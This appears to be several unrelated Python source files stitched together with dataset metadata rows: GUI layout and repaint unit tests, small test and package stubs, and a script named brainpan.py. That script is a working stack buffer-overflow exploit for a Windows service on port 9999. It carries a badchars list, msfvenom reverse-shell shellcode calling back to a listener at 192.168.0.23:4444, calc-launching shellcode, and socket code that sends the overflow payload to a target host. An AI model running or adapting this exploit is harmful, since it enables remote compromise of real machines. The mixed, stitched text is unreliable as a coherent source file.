    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        content = TestCanvasItem()
        # extremely tall content (30000) forces the thumb down to its minimum height
        content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=30000), immediate=True)
        scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
        scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
        canvas_item.add_canvas_item(scroll_area)
        canvas_item.add_canvas_item(scroll_bar)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
        # check assumptions: thumb is clamped to 32px rather than the proportional size
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=32)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=30000)))
        # drag the thumb down as far as possible; content must reach -29500, the
        # farthest scroll position (30000 content - 500 viewport)
        self.simulate_drag(canvas_widget, Geometry.IntPoint(x=90, y=8), Geometry.IntPoint(x=90, y=500))
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=468), size=Geometry.IntSize(width=16, height=32)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-29500), size=Geometry.IntSize(width=100, height=30000)))
def test_resizing_scroll_area_with_scroll_bar_adjusts_thumb_rect(self):
    """Growing the viewport should grow the thumb to the new visible/content ratio."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        content = TestCanvasItem()
        content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
        scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
        scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
        canvas_item.add_canvas_item(scroll_area)
        canvas_item.add_canvas_item(scroll_bar)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
        # check assumptions: 500/1000 visible -> 250px thumb
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
        # resize the canvas item to 750 tall: 750/1000 visible -> thumb is 75% of 750
        canvas_item.size_changed(100, 750)
        canvas_item.refresh_layout_immediate()
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=int(750 * 0.75))))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
def test_resizing_scroll_area_with_scroll_bar_adjusts_thumb_rect_when_canvas_is_offset_already(self):
    """Growing the viewport while scrolled to the end should pull the content back in."""
    # setup canvas
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        content = TestCanvasItem()
        content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000), immediate=True)
        scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
        scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
        canvas_item.add_canvas_item(scroll_area)
        canvas_item.add_canvas_item(scroll_bar)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500), immediate=True)
        # scroll all the way to the bottom before resizing
        content._set_canvas_origin(Geometry.IntPoint(x=0, y=-500))
        # check assumptions: thumb sits at the bottom half of the track
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
        # resize the canvas item to 750: max scroll is now 1000-750=250, so the
        # content origin must be clamped from -500 up to -250
        canvas_item.size_changed(100, 750)
        canvas_item.refresh_layout_immediate()
        self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=750 - int(750 * 0.75)), size=Geometry.IntSize(width=16, height=int(750 * 0.75))))
        self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-250), size=Geometry.IntSize(width=100, height=1000)))
def test_resizing_scroll_area_content_with_adjusts_thumb_rect(self):
    """Shrinking the content should enlarge the thumb to match the new ratio."""
    # setup canvas
    canvas_item = CanvasItem.CanvasItemComposition()
    canvas_item.layout = CanvasItem.CanvasItemRowLayout()
    content = TestCanvasItem()
    content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
    scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
    scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
    canvas_item.add_canvas_item(scroll_area)
    canvas_item.add_canvas_item(scroll_bar)
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
    # check assumptions: 500/1000 visible -> 250px thumb
    self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=250)))
    self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=1000)))
    # resize the content. make sure the thumb_rect is correct: 500/750 -> 2/3 of 500
    content.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=750))
    self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=16, height=int(500*2.0/3))))
    self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=0), size=Geometry.IntSize(width=100, height=750)))
def test_resizing_scroll_area_content_with_scroll_bar_adjusts_content_position(self):
    """Shrinking content while scrolled must clamp the origin to a valid position."""
    # setup canvas
    canvas_item = CanvasItem.CanvasItemComposition()
    canvas_item.layout = CanvasItem.CanvasItemRowLayout()
    content = TestCanvasItem()
    content.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=100, height=1000))
    scroll_area = CanvasItem.ScrollAreaCanvasItem(content)
    scroll_bar = CanvasItem.ScrollBarCanvasItem(scroll_area)
    canvas_item.add_canvas_item(scroll_area)
    canvas_item.add_canvas_item(scroll_bar)
    canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=500))
    # scroll to the bottom of the 1000-tall content
    content._set_canvas_origin(Geometry.IntPoint(x=0, y=-500))
    # check assumptions
    self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=250), size=Geometry.IntSize(width=16, height=250)))
    self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-500), size=Geometry.IntSize(width=100, height=1000)))
    # resize the content. make sure that it will not let the origin be wrong:
    # with 750-tall content the farthest valid origin is -250, not -500
    content.update_layout(Geometry.IntPoint(x=0, y=-500), Geometry.IntSize(width=100, height=750))
    self.assertEqual(scroll_bar.thumb_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=int(500*1.0/3+0.5)), size=Geometry.IntSize(width=16, height=int(500*2.0/3))))
    self.assertEqual(content.canvas_rect, Geometry.IntRect(origin=Geometry.IntPoint(x=0, y=-250), size=Geometry.IntSize(width=100, height=750)))
def test_removing_item_from_layout_causes_container_to_relayout(self):
    """Removing a child from a column should trigger a relayout of the remainder."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
        empty1 = CanvasItem.EmptyCanvasItem()
        empty2 = CanvasItem.EmptyCanvasItem()
        # second item is fixed at 40px; the first absorbs the remaining 60px
        empty2.sizing.set_fixed_height(40)
        canvas_item.add_canvas_item(empty1)
        canvas_item.add_canvas_item(empty2)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
        # check assumptions
        self.assertEqual(empty1.canvas_bounds.height, 60)
        self.assertEqual(empty2.canvas_bounds.height, 40)
        # remove 2nd canvas item
        canvas_item.remove_canvas_item(empty2)
        # check that column was laid out again: the survivor now fills the column
        canvas_item.refresh_layout_immediate()
        self.assertEqual(empty1.canvas_bounds.height, 100)
def test_removing_item_from_collapsible_layout_that_gets_resized_causes_container_to_relayout(self):
    """Emptying a collapsible row should shrink it to zero and relayout the column."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
        empty1 = CanvasItem.EmptyCanvasItem()
        row = CanvasItem.CanvasItemComposition()
        # collapsible: the row may shrink to nothing when it has no content
        row.sizing.collapsible = True
        row.layout = CanvasItem.CanvasItemRowLayout()
        empty2 = CanvasItem.EmptyCanvasItem()
        empty2.sizing.set_fixed_height(40)
        canvas_item.add_canvas_item(empty1)
        row.add_canvas_item(empty2)
        canvas_item.add_canvas_item(row)
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
        # check assumptions: row takes the fixed 40px of its single child
        self.assertEqual(empty1.canvas_bounds.height, 60)
        self.assertEqual(row.canvas_bounds.height, 40)
        self.assertEqual(empty2.canvas_bounds.height, 40)
        # remove 2nd canvas item
        row.remove_canvas_item(empty2)
        # check that column was laid out again: row collapses to 0, sibling fills
        canvas_item.refresh_layout_immediate()
        self.assertEqual(empty1.canvas_bounds.height, 100)
        self.assertEqual(row.canvas_bounds.height, 0)
def test_preferred_size_in_overlap_does_not_limit_sibling_sizes(self):
    """An overlap child with a preferred size must not constrain its overlap siblings."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container = CanvasItem.CanvasItemComposition() # overlap layout
        item1 = CanvasItem.CanvasItemComposition()
        item2 = CanvasItem.CanvasItemComposition()
        row = CanvasItem.CanvasItemComposition()
        row.layout = CanvasItem.CanvasItemRowLayout()
        column = CanvasItem.CanvasItemComposition()
        column.layout = CanvasItem.CanvasItemColumnLayout()
        # item1 carries internal stretch/spacing so it acquires sizing preferences;
        # item2 is left empty (no preferred size)
        row.add_stretch()
        row.add_spacing(8)
        column.add_stretch()
        column.add_canvas_item(row)
        column.add_spacing(8)
        item1.add_canvas_item(column)
        container.add_canvas_item(item1)
        container.add_canvas_item(item2)
        canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
        canvas_item.add_canvas_item(container)
        canvas_item.add_stretch()
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
        # check that items use full container (due to item2 not having preferred size)
        self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_height)
        self.assertEqual(item1.canvas_size.width, 100)
        self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
        self.assertEqual(item2.canvas_size.width, 100)
        self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_preferred_width_in_column_does_not_limit_sibling_sizes(self):
    """A column child with a preferred width must not constrain its column siblings."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container = CanvasItem.CanvasItemComposition() # column layout
        container.layout = CanvasItem.CanvasItemColumnLayout()
        item1 = CanvasItem.CanvasItemComposition()
        item2 = CanvasItem.CanvasItemComposition()
        row = CanvasItem.CanvasItemComposition()
        row.layout = CanvasItem.CanvasItemRowLayout()
        # item1 carries internal stretch/spacing; item2 stays empty (no preferences)
        row.add_stretch()
        row.add_spacing(8)
        item1.add_canvas_item(row)
        container.add_canvas_item(item1)
        container.add_canvas_item(item2)
        canvas_item.layout = CanvasItem.CanvasItemRowLayout()
        canvas_item.add_canvas_item(container)
        canvas_item.add_stretch()
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
        # check that items use full container width (due to item2 not having preferred width)
        self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_width)
        self.assertEqual(item1.canvas_size.width, 50)
        self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
        self.assertEqual(item2.canvas_size.width, 50)
        self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_preferred_height_in_row_does_not_limit_sibling_sizes(self):
    """A row child with a preferred height must not constrain its row siblings."""
    ui = TestUI.UserInterface()
    canvas_widget = ui.create_canvas_widget()
    with contextlib.closing(canvas_widget):
        canvas_item = canvas_widget.canvas_item
        container = CanvasItem.CanvasItemComposition() # row layout
        container.layout = CanvasItem.CanvasItemRowLayout()
        item1 = CanvasItem.CanvasItemComposition()
        item2 = CanvasItem.CanvasItemComposition()
        column = CanvasItem.CanvasItemComposition()
        column.layout = CanvasItem.CanvasItemColumnLayout()
        # item1 carries internal stretch/spacing; item2 stays empty (no preferences)
        column.add_stretch()
        column.add_spacing(8)
        item1.add_canvas_item(column)
        container.add_canvas_item(item1)
        container.add_canvas_item(item2)
        canvas_item.layout = CanvasItem.CanvasItemColumnLayout()
        canvas_item.add_canvas_item(container)
        canvas_item.add_stretch()
        canvas_item.update_layout(Geometry.IntPoint(x=0, y=0), Geometry.IntSize(width=100, height=100), immediate=True)
        # check that items use full container width (due to item2 not having preferred width)
        self.assertIsNone(container.layout.get_sizing(container.canvas_items).preferred_width)
        self.assertEqual(item1.canvas_size.width, 50)
        self.assertEqual(item1.canvas_size.height, 50) # vertical is shared evenly between item1 and stretch
        self.assertEqual(item2.canvas_size.width, 50)
        self.assertEqual(item2.canvas_size.height, 50) # vertical is shared evenly between item2 and stretch
def test_repaint_immediate_paints_child_layers_and_their_elements_too(self):
    """Verify repaint_immediate also repaints nested layers and their children."""
    root_layer = CanvasItem.LayerCanvasItem()
    with contextlib.closing(root_layer):
        composition = CanvasItem.CanvasItemComposition()
        nested_layer = CanvasItem.LayerCanvasItem()
        leaf_item = TestCanvasItemClass.TestCanvasItem()
        # build the hierarchy: root layer -> composition -> nested layer -> leaf
        root_layer.add_canvas_item(composition)
        composition.add_canvas_item(nested_layer)
        nested_layer.add_canvas_item(leaf_item)
        # snapshot repaint counts, repaint immediately, and verify each item
        # in the chain was repainted exactly once
        watched = (root_layer, nested_layer, leaf_item)
        counts_before = [item._repaint_count for item in watched]
        root_layer.repaint_immediate(DrawingContext.DrawingContext(), Geometry.IntSize(100, 100))
        for count_before, item in zip(counts_before, watched):
            self.assertEqual(count_before + 1, item._repaint_count)
def test_repaint_threaded_paints_child_layers_and_their_elements_too(self):
    """Verify threaded rendering repaints nested layers and their children."""
    CanvasItem._threaded_rendering_enabled = True
    root_layer = CanvasItem.LayerCanvasItem()
    with contextlib.closing(root_layer):
        composition = CanvasItem.CanvasItemComposition()
        nested_layer = CanvasItem.LayerCanvasItem()
        leaf_item = TestCanvasItemClass.TestCanvasItem()
        # build the hierarchy: root layer -> composition -> nested layer -> leaf
        root_layer.add_canvas_item(composition)
        composition.add_canvas_item(nested_layer)
        nested_layer.add_canvas_item(leaf_item)
        # lay out the root layer with its initial size
        root_layer.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=640, height=480))
        # sleep a short time to allow the render thread to run
        time.sleep(0.05)
        # snapshot the repaint counts
        watched = (root_layer, nested_layer, leaf_item)
        counts_before = [item._repaint_count for item in watched]
        # updating the leaf should propagate a repaint up the whole chain
        leaf_item.update()
        # sleep a short time to allow the render thread to run
        time.sleep(0.05)
        # each item in the chain must have repainted exactly once more
        for count_before, item in zip(counts_before, watched):
            self.assertEqual(count_before + 1, item._repaint_count)
def test_update_during_repaint_triggers_another_repaint(self):
    """An update arriving mid-repaint must schedule one more repaint."""
    CanvasItem._threaded_rendering_enabled = True
    root_layer = CanvasItem.LayerCanvasItem()
    with contextlib.closing(root_layer):
        slow_item = TestCanvasItemClass.TestCanvasItem()
        slow_item.repaint_delay = 0.05  # make each repaint take measurable time
        root_layer.add_canvas_item(slow_item)
        # initial layout kicks off the first (slow) repaint
        root_layer.update_layout(Geometry.IntPoint(), Geometry.IntSize(width=640, height=480), immediate=True)
        # request an update while the first repaint is still in progress...
        time.sleep(slow_item.repaint_delay / 2)
        slow_item.update()
        # ...then wait long enough for the follow-up repaint to complete
        time.sleep(slow_item.repaint_delay * 2)
        # two repaints total: the initial one plus the one queued mid-repaint
        self.assertEqual(slow_item.repaint_count, 2)
# Script entry point: enable verbose logging and run the full test suite.
if __name__ == '__main__':
    logging.getLogger().setLevel(logging.DEBUG)
    unittest.main()
| 65.657669
| 182
| 0.720132
| 13,352
| 107,022
| 5.510186
| 0.034527
| 0.124096
| 0.060675
| 0.04306
| 0.925434
| 0.908974
| 0.891535
| 0.87449
| 0.849698
| 0.832164
| 0
| 0.043366
| 0.17887
| 107,022
| 1,629
| 183
| 65.697974
| 0.79383
| 0.040786
| 0
| 0.689481
| 0
| 0
| 0.004059
| 0
| 0
| 0
| 0
| 0
| 0.239193
| 1
| 0.071326
| false
| 0.00072
| 0.005764
| 0.001441
| 0.080692
| 0.00072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a6b9b57140482a1f62b8f1423c66cfad289eadd
| 4,143
|
py
|
Python
|
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 18
|
2019-04-11T02:27:07.000Z
|
2022-01-24T09:53:13.000Z
|
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | null | null | null |
codes/brainpan.py
|
SkyBulk/exploit-development
|
0653997e264a9e9113f633b4de977a978d39e8c5
|
[
"MIT"
] | 11
|
2019-04-03T12:15:45.000Z
|
2022-03-23T15:02:32.000Z
|
#!/usr/bin/python
# tested on windows 7 x86 sp1
import socket
import struct
badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
badchars += "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
badchars += "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
badchars += "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
badchars += "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
badchars += "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
badchars += "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
badchars += "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00"
shellcode = ""
shellcode += "\xdb\xc1\xba\x4f\x40\xb0\xd8\xd9\x74\x24\xf4\x5d"
shellcode += "\x2b\xc9\xb1\x52\x31\x55\x17\x83\xed\xfc\x03\x1a"
shellcode += "\x53\x52\x2d\x58\xbb\x10\xce\xa0\x3c\x75\x46\x45"
shellcode += "\x0d\xb5\x3c\x0e\x3e\x05\x36\x42\xb3\xee\x1a\x76"
shellcode += "\x40\x82\xb2\x79\xe1\x29\xe5\xb4\xf2\x02\xd5\xd7"
shellcode += "\x70\x59\x0a\x37\x48\x92\x5f\x36\x8d\xcf\x92\x6a"
shellcode += "\x46\x9b\x01\x9a\xe3\xd1\x99\x11\xbf\xf4\x99\xc6"
shellcode += "\x08\xf6\x88\x59\x02\xa1\x0a\x58\xc7\xd9\x02\x42"
shellcode += "\x04\xe7\xdd\xf9\xfe\x93\xdf\x2b\xcf\x5c\x73\x12"
shellcode += "\xff\xae\x8d\x53\x38\x51\xf8\xad\x3a\xec\xfb\x6a"
shellcode += "\x40\x2a\x89\x68\xe2\xb9\x29\x54\x12\x6d\xaf\x1f"
shellcode += "\x18\xda\xbb\x47\x3d\xdd\x68\xfc\x39\x56\x8f\xd2"
shellcode += "\xcb\x2c\xb4\xf6\x90\xf7\xd5\xaf\x7c\x59\xe9\xaf"
shellcode += "\xde\x06\x4f\xa4\xf3\x53\xe2\xe7\x9b\x90\xcf\x17"
shellcode += "\x5c\xbf\x58\x64\x6e\x60\xf3\xe2\xc2\xe9\xdd\xf5"
shellcode += "\x25\xc0\x9a\x69\xd8\xeb\xda\xa0\x1f\xbf\x8a\xda"
shellcode += "\xb6\xc0\x40\x1a\x36\x15\xc6\x4a\x98\xc6\xa7\x3a"
shellcode += "\x58\xb7\x4f\x50\x57\xe8\x70\x5b\xbd\x81\x1b\xa6"
shellcode += "\x56\x6e\x73\xa8\xaa\x06\x86\xa8\xa3\x8a\x0f\x4e"
shellcode += "\xa9\x22\x46\xd9\x46\xda\xc3\x91\xf7\x23\xde\xdc"
shellcode += "\x38\xaf\xed\x21\xf6\x58\x9b\x31\x6f\xa9\xd6\x6b"
shellcode += "\x26\xb6\xcc\x03\xa4\x25\x8b\xd3\xa3\x55\x04\x84"
shellcode += "\xe4\xa8\x5d\x40\x19\x92\xf7\x76\xe0\x42\x3f\x32"
shellcode += "\x3f\xb7\xbe\xbb\xb2\x83\xe4\xab\x0a\x0b\xa1\x9f"
shellcode += "\xc2\x5a\x7f\x49\xa5\x34\x31\x23\x7f\xea\x9b\xa3"
shellcode += "\x06\xc0\x1b\xb5\x06\x0d\xea\x59\xb6\xf8\xab\x66"
shellcode += "\x77\x6d\x3c\x1f\x65\x0d\xc3\xca\x2d\x3d\x8e\x56"
shellcode += "\x07\xd6\x57\x03\x15\xbb\x67\xfe\x5a\xc2\xeb\x0a"
shellcode += "\x23\x31\xf3\x7f\x26\x7d\xb3\x6c\x5a\xee\x56\x92"
shellcode += "\xc9\x0f\x73"
# pop calc.exe
shellcode = "\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
shellcode += "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
shellcode += "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
shellcode += "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
shellcode += "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
shellcode += "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
shellcode += "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC"
payload = 'A' * 524 + "\xf3\x12\x17\x31" + "\x90" * 16 + shellcode
try:
print "\nSending tons of random bytes..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.0.28',9999))
s.recv(1024)
s.send(payload)
s.close()
print "\nDone! Wonder if we got that shell back?"
except:
print "Could not connect to 9999 for some reason..."
| 55.24
| 142
| 0.704079
| 848
| 4,143
| 3.432783
| 0.385613
| 0.006183
| 0.004809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.240031
| 0.061791
| 4,143
| 74
| 143
| 55.986486
| 0.508876
| 0.040309
| 0
| 0
| 0
| 0.745763
| 0.746724
| 0.705645
| 0.016949
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.033898
| null | null | 0.050847
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2a6d03a2aa24ea78b3fdae4a0208329118dca0e5
| 237
|
py
|
Python
|
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
AllTest/testall.py
|
VargaIonut23/cinema
|
108f8a67ea2002ed7cd0a9839ad2024af8bd64f3
|
[
"MIT"
] | null | null | null |
from AllTest.test_all_service import test_All_Service
from AllTest.testdomain import test_domain
from AllTest.testrepository import test_all_repository
def test_all():
    """Run every test suite in order: domain, repository, then service."""
    for run_suite in (test_domain, test_all_repository, test_All_Service):
        run_suite()
| 23.7
| 54
| 0.818565
| 33
| 237
| 5.484848
| 0.333333
| 0.232044
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130802
| 237
| 9
| 55
| 26.333333
| 0.878641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| true
| 0
| 0.428571
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a7465b4ef95b6caa84ab8dd772a2360229c2aaa
| 25
|
py
|
Python
|
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
cursoemvideo/python3_mundo3/aula_22/desafios aula 22/ex112/__init__.py
|
Tiago-Baptista/CursoEmVideo_Python3
|
381044e66594362a3767a776530c2ba7dc02dcf2
|
[
"MIT"
] | null | null | null |
import moeda
import dado
| 8.333333
| 12
| 0.84
| 4
| 25
| 5.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 2
| 13
| 12.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2a8c8bbc43f74d59816034a4fbeb35c3f24cb4d1
| 178
|
py
|
Python
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | 3
|
2019-03-20T17:54:59.000Z
|
2019-07-04T07:11:47.000Z
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | 50
|
2019-03-21T19:13:43.000Z
|
2019-10-09T17:42:58.000Z
|
project/conftest.py
|
westnetz/anschluss
|
fbe5f8b1b7f64b2b042ecdda3e56dc0cc91e1048
|
[
"MIT"
] | null | null | null |
import os
import configurations
